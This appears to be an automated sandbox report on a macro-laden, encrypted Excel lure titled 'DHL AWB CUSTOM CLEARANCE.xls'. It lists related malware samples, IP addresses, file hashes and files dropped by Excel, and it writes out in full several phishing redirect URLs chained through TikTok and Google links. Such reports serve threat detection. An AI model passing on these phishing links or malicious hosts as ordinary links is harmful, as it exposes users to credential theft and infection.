                                                PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                                                • 14.103.79.10
                                                s-part-0017.t-0009.fb-t-msedge.netQUOTATION REQUIRED_Enatel s.r.l..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 13.107.253.45
                                                PlusPrivStoreAtt116.exeGet hashmaliciousUnknownBrowse
                                                • 13.107.253.45
                                                https://forms.office.com/e/xknrfCPQkRGet hashmaliciousHTMLPhisherBrowse
                                                • 13.107.253.45
                                                q9JZUaS1Gy.docGet hashmaliciousUnknownBrowse
                                                • 13.107.253.45
                                                https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fjobuli.in%2Fwinner%2FsXtxg%2FbWFyc2hhLnJvd2xhbmRAY2hlcm9rZWVicmljay5jb20=?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmGet hashmaliciousHTMLPhisherBrowse
                                                • 13.107.253.45
                                                https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fmessagupdates.courtfilepro.com%2FVTtMaGet hashmaliciousHTMLPhisherBrowse
                                                • 13.107.253.45
                                                P-04071A.xlsGet hashmaliciousUnknownBrowse
                                                • 13.107.253.45
                                                P-04071A.xlsGet hashmaliciousUnknownBrowse
                                                • 13.107.253.45
                                                1736856908fb16676aec3e4c808c4bd5cde8e123cc70360266f85ec0ed17050bca6456c9dd274.dat-decoded.exeGet hashmaliciousXWormBrowse
                                                • 13.107.253.45
                                                pdf_2025 QUOTATION - #202401146778.pdf (83kb).com.exeGet hashmaliciousPureLog Stealer, QuasarBrowse
                                                • 13.107.253.45
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                WORLDPHONE-INASNumberforInterdomainRoutingINP-04071A.xlsGet hashmaliciousUnknownBrowse
                                                • 14.103.79.10
                                                P-04071A.xlsGet hashmaliciousUnknownBrowse
                                                • 14.103.79.10
                                                P-04071A.xlsGet hashmaliciousUnknownBrowse
                                                • 14.103.79.10
                                                5.elfGet hashmaliciousUnknownBrowse
                                                • 14.103.40.242
                                                Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                                                • 14.103.79.10
                                                Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                                                • 14.103.79.10
                                                Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                                                • 14.103.79.10
                                                PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                                                • 14.103.79.10
                                                PO#3311-20250108003.xlsGet hashmaliciousUnknownBrowse
                                                • 14.103.79.10
                                                UNASSIGNEDmeth10.elfGet hashmaliciousMiraiBrowse
                                                • 41.220.60.247
                                                meth4.elfGet hashmaliciousMiraiBrowse
                                                • 41.220.60.241
                                                meth14.elfGet hashmaliciousMiraiBrowse
                                                • 157.225.246.181
                                                mpsl.elfGet hashmaliciousUnknownBrowse
                                                • 147.136.59.48
                                                P-04071A.xlsGet hashmaliciousUnknownBrowse
                                                • 131.226.2.34
                                                P-04071A.xlsGet hashmaliciousUnknownBrowse
                                                • 131.226.2.34
                                                P-04071A.xlsGet hashmaliciousUnknownBrowse
                                                • 131.226.2.34
                                                3.elfGet hashmaliciousUnknownBrowse
                                                • 144.74.225.103
                                                sora.mpsl.elfGet hashmaliciousUnknownBrowse
                                                • 146.131.7.202
                                                MICROSOFT-CORP-MSN-AS-BLOCKUSEFT_Payment_Notification_Gheenirrigation.htmlGet hashmaliciousHTMLPhisherBrowse
                                                • 20.190.159.75
                                                MissedCall_Record_3295935663.htmlGet hashmaliciousUnknownBrowse
                                                • 13.69.116.109
                                                Message.emlGet hashmaliciousHTMLPhisherBrowse
                                                • 52.109.32.97
                                                http://www.affordablehousing.com/MaineCWLGet hashmaliciousUnknownBrowse
                                                • 13.107.246.40
                                                Message.emlGet hashmaliciousHTMLPhisherBrowse
                                                • 52.113.194.132
                                                PropostaOrcamentoPdf.msiGet hashmaliciousAteraAgentBrowse
                                                • 20.60.197.1
                                                https://microsoft-visio.en.softonic.com/Get hashmaliciousUnknownBrowse
                                                • 13.107.246.44
                                                phish_alert_iocp_v1.4.58.emlGet hashmaliciousUnknownBrowse
                                                • 52.109.28.46
                                                email.emlGet hashmaliciousunknownBrowse
                                                • 13.89.179.9
                                                meth10.elfGet hashmaliciousMiraiBrowse
                                                • 104.209.115.160
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                258a5a1e95b8a911872bae9081526644P-04071A.xlsGet hashmaliciousUnknownBrowse
                                                • 13.107.253.45
                                                ProductBOMpq_v4.xlsmGet hashmaliciousUnknownBrowse
                                                • 13.107.253.45
                                                RFQ____PC25-1301.xlsxGet hashmaliciousUnknownBrowse
                                                • 13.107.253.45
                                                B317.xlsxGet hashmaliciousUnknownBrowse
                                                • 13.107.253.45
                                                YYYY-NNN AUDIT DETAIL REPORT .docxGet hashmaliciousUnknownBrowse
                                                • 13.107.253.45
                                                CY SEC AUDIT PLAN 2025.docx.docGet hashmaliciousUnknownBrowse
                                                • 13.107.253.45
                                                H565rymIuO.docGet hashmaliciousUnknownBrowse
                                                • 13.107.253.45
                                                Sample_Order_000000991.xlsGet hashmaliciousUnknownBrowse
                                                • 13.107.253.45
                                                Payment_swift_copy.xlsGet hashmaliciousUnknownBrowse
                                                • 13.107.253.45
                                                No context
                                                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):118
                                                Entropy (8bit):3.5700810731231707
                                                Encrypted:false
                                                SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                MD5:573220372DA4ED487441611079B623CD
                                                SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                                                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1568
                                                Entropy (8bit):2.6925714266183878
                                                Encrypted:false
                                                SSDEEP:24:YxIPuk+zbl3HyFOqYp2IyoeyjkFP5VQBMQRgYOCE+E7UXOKI5KazYvKISmtzGdbq:YxAT+XKUFM78BMQiYOSVIADK+GTzq
                                                MD5:03EB41376AB44AF89FE0596042E4684D
                                                SHA1:3D4861D892DB290349DB027061BF2E98A326E158
                                                SHA-256:4A6237F18AEC2FD5C73E18069B76F18A7A068465ADE633FEE9ADEFD388553ED9
                                                SHA-512:8D38C445843714AB70607E2C60B0EA0CC5F85CB44D034C0AF32FB8FD8CC44A85760881BAD2A8E8820A5F4C95595E0B02198555D24942556C5E761BA87F0F4F70
                                                Malicious:false
                                                Reputation:low
                                                Preview:3.7.4.6.3.7.8.,.3.7.4.6.3.7.6.,.1.0.7.,.6.3.6.4.3.3.4.,.1.1.9.6.3.7.8.,.2.5.5.0.5.0.8.8.,.1.0.1.,.1.0.4.9.5.2.3.4.,.1.1.9.,.7.0.0.9.9.8.4.,.1.1.9.6.2.9.3.,.1.2.4.,.6.3.6.4.3.3.1.,.1.5.6.1.9.5.8.,.6.5.4.2.1.8.5.1.,.1.2.5.,.6.3.6.4.3.3.2.,.1.2.8.,.1.0.0.,.1.0.3.,.1.0.4.,.1.0.5.,.1.0.6.,.1.0.8.,.1.0.9.,.1.1.2.,.1.1.4.,.1.1.8.,.1.2.0.,.3.0.0.4.9.2.6.8.,.1.2.1.,.1.2.2.,.5.4.5.6.5.4.3.,.1.2.3.,.1.2.6.,.1.2.2.3.4.3.4.,.4.5.8.4.0.2.3.2.,.2.6.0.1.,.8.7.4.7.0.1.5.3.,.3.7.4.6.2.5.9.,.3.7.4.6.2.6.5.,.3.7.4.6.2.5.8.,.;.9.,.6.1.7.0.7.3.0.5.,.3.,.3.0.1.5.3.7.2.1.,.4.0.6.9.3.5.8.2.,.2.3.7.1.6.5.1.,.6.3.6.4.3.3.7.,.2.7.3.6.0.0.9.5.,.2.6.4.8.5.7.8.4.,.6.1.7.0.7.3.0.7.,.3.3.7.9.1.6.2.,.3.2.9.4.5.8.7.9.9.,.2.4.6.0.9.2.5.8.,.1.3.5.2.5.8.6.,.5.7.9.9.9.6.6.1.,.4.8.1.9.5.5.3.8.,.7.4.5.3.4.5.9.,.2.7.1.5.3.4.9.7.,.3.7.4.6.3.7.9.,.6.3.7.1.6.9.4.,.1.3.,.3.0.1.2.3.4.6.6.,.3.4.1.4.8.5.6.8.,.6.5.4.0.2.1.5.,.5.8.4.2.5.8.6.0.,.6.3.0.6.3.0.9.9.,.4.,.5.9.2.2.3.4.3.7.,.1.0.6.9.5.5.2.,.5.2.9.1.0.0.0.2.,.1.1.7.,.1.4.6.1.9.
                                                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):20971520
                                                Entropy (8bit):8.112143835430977E-5
                                                Encrypted:false
                                                SSDEEP:3:Tuekk9NJtHFfs1XsExe/t:qeVJ8
                                                MD5:AFDEAC461EEC32D754D8E6017E845D21
                                                SHA1:5D0874C19B70638A0737696AEEE55BFCC80D7ED8
                                                SHA-256:3A96B02F6A09F6A6FAC2A44A5842FF9AEB17EB4D633E48ABF6ADDF6FB447C7E2
                                                SHA-512:CAB6B8F9FFDBD80210F42219BAC8F1124D6C0B6995C5128995F7F48CED8EF0F2159EA06A2CD09B1FDCD409719F94A7DB437C708D3B1FDA01FDC80141A4595FC7
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):20971520
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                Malicious:false
                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):71
                                                Entropy (8bit):4.3462513114457515
                                                Encrypted:false
                                                SSDEEP:3:Tuekk9NJtHFfs1XsExen:qeVJ8u
                                                MD5:8F4510F128F81A8BAF2A345D00F7E30C
                                                SHA1:8C711E6C484881ECDC83B6BDAC41C7A19EDE9C37
                                                SHA-256:15AA8B35FC5F139EF0B0FBC641CAA862AED19674625B81D1DC63467BC0AAFED9
                                                SHA-512:78695E5E2337703757903B8452E31A98F860022B04972651212C3004FEBE29017380A8BCA9FCCFD935DE00D8BD73AA556C30A3CEA5FC76E7ADF7E7763D68E78F
                                                Malicious:false
                                                Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..
                                                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                File Type:ASCII text, with very long lines (28591), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):20971520
                                                Entropy (8bit):0.21844889999571832
                                                Encrypted:false
                                                SSDEEP:1536:PqlxqEUGhonwsF1xZ52Njz4SIIRYPE6nm4DMbivMeLaLY+IUpAITVBmcDbsTPQ1x:WxT9sFR52HBYx/q2H29dB0m
                                                MD5:389041C9436CB89A97CA8B709B9AC709
                                                SHA1:41F4003308B4AD919C6F813C2FC86C0EE24062AA
                                                SHA-256:72D7FE61DF57E906EFAEDA5D70CE43E6AADD7B1ADA447713DE22852275B5C009
                                                SHA-512:076C5A820B8618889CBD31F48F5D8BBC1ACB23FEB178783B5A5DD72DBE27989ACC4BEDD8F3BD8F01D83BBC0930F5F06D6AFAF68E2A3379A452E0137BBF9A1396
                                                Malicious:false
                                                Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..01/14/2025 18:15:16.874.EXCEL (0x2164).0x21C8.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":17,"Time":"2025-01-14T18:15:16.874Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-01-14T18:15:16.5934542Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-01-14T18:15:16.5934542Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-01-14T18:15:16.5934542Z\", \"C\" : \"\", \"Q\" : 25.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \
                                                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):20971520
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                Malicious:false
                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                File Type:ASCII text, with very long lines (28718), with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):317470
                                                Entropy (8bit):5.123941569007878
                                                Encrypted:false
                                                SSDEEP:1536:MqF0R3HgkziX8DozASBhV1lWxeMovJj4YTzAHksliayf8Hlmz606++YTr/HFpprI:F07iXZxBh7cQ1SeVB9dB0mI
                                                MD5:E1D34F17B4C8ACC702A7FC89B00CC3E8
                                                SHA1:41BD3FA6E37D93F39EF2387B79FECB68F7AFA25D
                                                SHA-256:CCA2C5820084FA9FB9686B09D88088CEED30C3A7F3E0E7C3D08A2D1A91552716
                                                SHA-512:627972F1823C02C0B9983C6D0A0A2944EB0A79484E50644531D846A5B5B48830BBBF0E3D2D0F3462602430B0F3DFB3D637A529BE8896C595CB4E76A76661D658
                                                Malicious:false
                                                Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..01/14/2025 18:16:33.656.EXCEL (0x2368).0x23CC.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":17,"Time":"2025-01-14T18:16:33.656Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-01-14T18:16:33.3597943Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-01-14T18:16:33.3597943Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-01-14T18:16:33.3597943Z\", \"C\" : \"\", \"Q\" : 5.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \"
                                                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):1536
                                                Entropy (8bit):1.267917815339349
                                                Encrypted:false
                                                SSDEEP:6:rl912N0xs+CFfOFalX+lG8ElCl5XCB9Xh9X:rl3lKFkuXanMClJCb7
                                                MD5:EDCE18B1818B546B95FDF789A5B639FB
                                                SHA1:55E1A21249A3E5A529625220B90CB908CAE93236
                                                SHA-256:41ACC5701978FA880CEB7DAD27331ACFC3CA290F6841E9FA85A988E5D7CCA9E0
                                                SHA-512:E19978A89D494F24C1F921EE78454046104DF2F6D7F7A0E3B2B2736798B8A0C76B8134570B163478AB5402A87A4F4B89AD8DAB5AD36355D57BCDB577D4F15742
                                                Malicious:false
                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):512
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                Malicious:false
                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):339968
                                                Entropy (8bit):7.562881393321611
                                                Encrypted:false
                                                SSDEEP:6144:rk3hbdlylKsgwyzcTbWhZFVE+WaxHAkJycxdI2rHJFZpLcriO5nzdbNih7FnOIbD:UJTxdI2z/A+OZzdbNih7FnRMOK1W
                                                MD5:97E5E86888768CEDD8BE04A16E1CD17E
                                                SHA1:B9FB882FEE714BD683CD7FD39F0AFEF712EFB3F0
                                                SHA-256:9EA184295F7696193279ABDEF9E640D042C5ACBD9E41BD4E8C6CB83055117715
                                                SHA-512:C69338E18378A0567956E98E427F2FAA56FDE32D166FD0796B07AC91149521D041A187441B135F669DBC9FB9A2968B2EAF4FB08FE009FF777E848488AA69B21E
                                                Malicious:false
                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):512
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                Malicious:false
                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Jan 14 18:16:31 2025, Security: 1
                                                Category:dropped
                                                Size (bytes):890880
                                                Entropy (8bit):7.639922008798411
                                                Encrypted:false
                                                SSDEEP:24576:cpbl/Az1dbIXRM7gV1u3bV8bARM8pwIKQs:QbpAMX+8V1u3bV9dw
                                                MD5:3469A1E372D9F03B7AF77E8B4892062D
                                                SHA1:04B114E7669D510901BEC332D96D173A8441AF05
                                                SHA-256:22C332DDB0B4D84DC449FD89DCD84792C8163DDF433F8A38E829FCB68B6D6F3D
                                                SHA-512:9CE604FE189877BD8B96012B57317CD08B825EE4FB1B8548ADE1F2065481569C8DED9F73221D9D93F7C5B979698A3DBE6E72A5EB2B56F6919BE941E9A012B842
                                                Malicious:false
                                                Preview:......................>...............................................................................C...D...................s...............................................................................................................................................................................................................................................................................................................................................................................................................B...$....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:false
                                                Preview:[ZoneTransfer]....ZoneId=0
                                                Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Jan 14 18:16:31 2025, Security: 1
                                                Category:dropped
                                                Size (bytes):890880
                                                Entropy (8bit):7.639922008798411
                                                Encrypted:false
                                                SSDEEP:24576:cpbl/Az1dbIXRM7gV1u3bV8bARM8pwIKQs:QbpAMX+8V1u3bV9dw
                                                MD5:3469A1E372D9F03B7AF77E8B4892062D
                                                SHA1:04B114E7669D510901BEC332D96D173A8441AF05
                                                SHA-256:22C332DDB0B4D84DC449FD89DCD84792C8163DDF433F8A38E829FCB68B6D6F3D
                                                SHA-512:9CE604FE189877BD8B96012B57317CD08B825EE4FB1B8548ADE1F2065481569C8DED9F73221D9D93F7C5B979698A3DBE6E72A5EB2B56F6919BE941E9A012B842
                                                Malicious:true
                                                Preview:......................>...............................................................................C...D...................s...............................................................................................................................................................................................................................................................................................................................................................................................................B...$....................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Jan 14 07:45:52 2025, Security: 1
                                                Entropy (8bit):7.76698927706814
                                                TrID:
                                                • Microsoft Excel sheet (30009/1) 47.99%
                                                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                File name:DHL AWB CUSTOM CLEARANCE.xls
                                                File size:1'275'904 bytes
                                                MD5:3954d9504039a8711e3ab29115d8054f
                                                SHA1:d0f3ceaf0393dd82d12b66dfcf5144ea1413e31d
                                                SHA256:26b53cef2e34ea99b37ad6e84736eeaa1851043d98b85ce831c946674b1ad1d8
                                                SHA512:eabc02fdaea0aa342282ce7c94c7d5b47bd8124e3b397ca376a05fe87ab4d46f5b071f0757e04295acaf201349822e41c690266640a58f5a34f8ec2e8c04b40b
                                                SSDEEP:24576:tkefLKSXea3tjAb1ZbcPBsTYGn3bV5bARM8CzdmRNy7Ei2tO8jS30B+fG71j:6efLKQ53lgkP28Gn3bVCUmzyYtJSQ+OB
                                                TLSH:E745F1C3A68D8F42C91943307AB35BAD07159D07D95262BB22F4771E6BF72C04A83F5A
                                                File Content Preview:........................>.......................................................................................................m.......o.......q.......s......................................................................................................
                                                Icon Hash:35ed8e920e8c81b5
                                                Document Type:OLE
                                                Number of OLE Files:1
                                                Has Summary Info:
                                                Application Name:Microsoft Excel
                                                Encrypted Document:True
                                                Contains Word Document Stream:False
                                                Contains Workbook/Book Stream:True
                                                Contains PowerPoint Document Stream:False
                                                Contains Visio Document Stream:False
                                                Contains ObjectPool Stream:False
                                                Flash Objects Count:0
                                                Contains VBA Macros:True
                                                Code Page:1252
                                                Author:
                                                Last Saved By:
                                                Create Time:2006-09-16 00:00:00
                                                Last Saved Time:2025-01-14 07:45:52
                                                Creating Application:Microsoft Excel
                                                Security:1
                                                Document Code Page:1252
                                                Thumbnail Scaling Desired:False
                                                Contains Dirty Links:False
                                                Shared Document:False
                                                Changed Hyperlinks:False
                                                Application Version:786432
                                                General
